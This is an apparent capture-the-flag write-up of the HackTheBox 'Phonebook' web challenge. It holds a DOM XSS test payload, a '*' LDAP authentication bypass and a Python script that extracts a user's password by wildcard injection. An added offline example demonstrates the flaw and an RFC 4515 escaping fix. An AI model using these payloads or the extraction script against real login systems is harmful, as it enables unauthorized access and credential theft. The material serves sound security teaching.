Phonebook — HTB Web Challenge Writeup

Sakibul Ali Khan
3 min read · Apr 28, 2023

--

CHALLENGE DESCRIPTION

Who is lucky enough to be included in the phonebook?

We start by visiting the web page, which presents us with a login form :))

The application asks us to log in, but we have no credentials. The login page does, however, carry a note:
New (9.8.2020): You can now login using the workstation username and password! - Reese
So a user named Reese exists, and the web login is backed by the workstation (directory) accounts rather than by a local user table.

A dummy attempt with username admin and password admin fails, and the page reports "Authentication failed" ::(

Look at the URL after the failed attempt: the error text is passed in a message query parameter and echoed into the page :) That is a candidate for XSS, so let's test it.

Viewing the page source shows the parameter being written into the document client-side, so the likely bug is DOM-based XSS. Let's try it.

XSS Payload:

http://206.189.121.131:30184/login?message=<img src='x' onerror='alert(1)'>

The DOM-based XSS fires !!! But alas, it is not the route to the flag, so we go back to the login form :((

Entering "*" as both the username and the password bypasses the authentication entirely and logs us in :)

That is a strong hint that the backend authenticates against LDAP. In an LDAP search filter, * is the wildcard, so if the submitted credentials are concatenated into a filter along the lines of (&(uid=<user>)(userPassword=<pass>)) without escaping, our input turns it into (&(uid=*)(userPassword=*)), which matches every entry, and the login succeeds.

Since the wildcard also matches partial values, the same injection lets us recover Reese's password one character at a time: the guess HTB{a*} succeeds only if the password starts with HTB{a. The following Python script automates that (the host and port are those of my challenge instance at the time and will differ for yours).

import requests
import string

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://167.99.84.37:32125/login"

# candidate characters; '*', '(', ')' and '\' are deliberately left out because
# they have special meaning inside an LDAP filter
chars = string.ascii_letters
chars += ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_', "'"])

counter = 0
flag = "HTB{"

while True:
    # if no char matched, the previous round already found the whole flag
    if counter == len(chars):
        print(flag + "}")
        break

    # creates something like HTB{a*}
    password = flag + chars[counter] + "*}"
    print("Trying: " + password)

    data = {"username": "Reese", "password": password}
    response = requests.post(url, headers=headers, data=data)

    # a failed login redirects back to /login?message=Authentication%20failed;
    # any other final URL means the wildcard guess matched
    if response.url != url + "?message=Authentication%20failed":
        # possible flag since we are still using * at the end: e.g. HTB{abc_*}
        # append chars[counter] so that we do not need to strip the trailing "*}"
        flag += chars[counter]
        counter = 0
    else:
        # increment the char since we might not have found the right letter
        counter += 1

Once every candidate character has been tried without a match, the current value of flag (with the closing brace appended and without the trailing *) is the complete password, which is the flag.
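To show why the wildcard bypass and the character-by-character extraction both work, and what the fix looks like, here is an added example that is not part of the original writeup and not the challenge's own code. It assumes a backend filter of the form (&(uid=<user>)(userPassword=<pass>)), which the page never shows, and it evaluates that filter locally against a constructed directory instead of a real LDAP server, so the whole attack and the RFC 4515 escaping fix can be run offline. The directory entries, the dummy password and the helper names are all assumptions.

```python
import re
import string

# Constructed sample directory: the real challenge backend and its data are not shown on the page.
DIRECTORY = [
    {"uid": "Reese", "userPassword": "HTB{constructed_dummy}"},
    {"uid": "alice", "userPassword": "correct horse battery staple"},
]


def build_filter_vulnerable(username, password):
    """Assumed (hypothetical) filter shape: user input is concatenated in, so '*' keeps its wildcard meaning."""
    return f"(&(uid={username})(userPassword={password}))"


def escape_filter_value(value):
    """RFC 4515 escaping for assertion values: \\ * ( ) and NUL become \\5c \\2a \\28 \\29 \\00."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def build_filter_safe(username, password):
    """Same filter, but every user-controlled value is escaped before it is inserted."""
    return f"(&(uid={escape_filter_value(username)})(userPassword={escape_filter_value(password)}))"


def value_to_regex(value):
    """Translate one assertion value into a regex: an unescaped '*' is a wildcard, '\\xx' is a literal byte."""
    parts = []
    i = 0
    while i < len(value):
        if value[i] == "\\" and i + 2 < len(value):
            parts.append(re.escape(chr(int(value[i + 1:i + 3], 16))))
            i += 3
        elif value[i] == "*":
            parts.append(".*")
            i += 1
        else:
            parts.append(re.escape(value[i]))
            i += 1
    return "".join(parts)


def ldap_search(directory, ldap_filter):
    """Minimal evaluator for filters of the form (&(attr=value)(attr=value)...); returns the matching entries."""
    assertions = re.findall(r"\((\w+)=((?:\\.|[^()\\])*)\)", ldap_filter)
    matches = []
    for entry in directory:
        if all(attr in entry and re.fullmatch(value_to_regex(val), entry[attr]) for attr, val in assertions):
            matches.append(entry)
    return matches


def login(directory, username, password, build_filter=build_filter_vulnerable):
    """Login succeeds when the filter matches at least one entry, which is what the '*' bypass relies on."""
    return len(ldap_search(directory, build_filter(username, password))) > 0


def extract_secret(oracle, charset, prefix="HTB{"):
    """Recover a value one character at a time with prefix + ch + '*' guesses, as the writeup's script does."""
    secret = prefix
    while True:
        for ch in charset:
            if oracle(secret + ch + "*"):
                secret += ch
                break
        else:
            return secret  # no candidate extended the prefix, so the value is complete


# '*', '(', ')' and '\' are left out of the candidate set because they are filter metacharacters
CHARSET = string.ascii_letters + string.digits + "_}"


def recover_reese_password(directory=DIRECTORY):
    """Drive the extraction using the local vulnerable login as the yes/no oracle."""
    return extract_secret(lambda guess: login(directory, "Reese", guess, build_filter_vulnerable), CHARSET)


if __name__ == "__main__":
    print("wildcard bypass, vulnerable filter:", login(DIRECTORY, "*", "*", build_filter_vulnerable))
    print("wildcard bypass, escaped filter:   ", login(DIRECTORY, "*", "*", build_filter_safe))
    print("recovered via injection:", recover_reese_password())
```

Two caveats. The evaluator only understands an AND of equality assertions, so it shows the wildcard problem but would not cope with an injected ")(|(..." clause that adds new branches to the filter; a real server would. And the extraction works in the challenge because userPassword is stored in the clear and matched with a substring filter; a directory that stores hashed passwords, or refuses substring matching on that attribute, does not leak anything this way even when the filter is still injectable.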

Hurrah!!! We have the flag we were after :))

Written by Sakibul Ali Khan

Hi, I am Sakibul Ali Khan, a Red Teaming enthusiast from Bangladesh and a Cybersecurity Researcher at Yogosha.